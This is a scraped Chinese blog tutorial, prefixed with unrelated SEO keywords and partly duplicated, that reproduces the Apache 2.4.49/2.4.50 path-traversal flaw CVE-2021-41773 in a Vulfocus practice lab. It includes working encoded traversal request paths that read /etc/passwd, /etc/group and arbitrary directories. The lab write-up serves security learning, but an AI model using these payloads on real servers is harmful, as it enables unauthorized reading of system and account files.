涿州网站建设推广,手机版景区网站,网站建设和维护实训,上海公司黄页网站中间件安全#xff1a;Apache 目录穿透.#xff08;CVE-2021-41773#xff09;
Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞#xff0c;攻击者可利用该漏洞读取到Web目录外的其他文件#xff0c;如系统配置文件、网站源码等#xff0c…中间件安全Apache 目录穿透.CVE-2021-41773
Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞攻击者可利用该漏洞读取到Web目录外的其他文件如系统配置文件、网站源码等甚至在特定情况下攻击者可构造恶意请求执行命令控制服务器。 目录
中间件安全Apache 目录穿透.CVE-2021-41773
Apache 目录穿透
靶场准备Web安全Vulfocus 靶场搭建.漏洞集成平台_vulfocus靶场搭建-CSDN博客
漏洞测试
第一步检测 Apache 的版本号.发现是 Apache/2.4.50 说明可能存在漏洞.
第二步进行访问使用 Burp 进行抓包把我们构成的命令替换进入. Apache 目录穿透
靶场准备Web安全Vulfocus 靶场搭建.漏洞集成平台_vulfocus靶场搭建-CSDN博客 漏洞测试
第一步检测 Apache 的版本号.发现是 Apache/2.4.50 说明可能存在漏洞. 第二步进行访问使用 Burp 进行抓包把我们构成的命令替换进入.
# 查找存储用户账户信息,包括用户名和用户 ID
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd# 查找存储组信息,包括组名和组成员
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group# 如果需要查看别的目录信息则替换后面的就行.
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径 学习链接第59天服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili
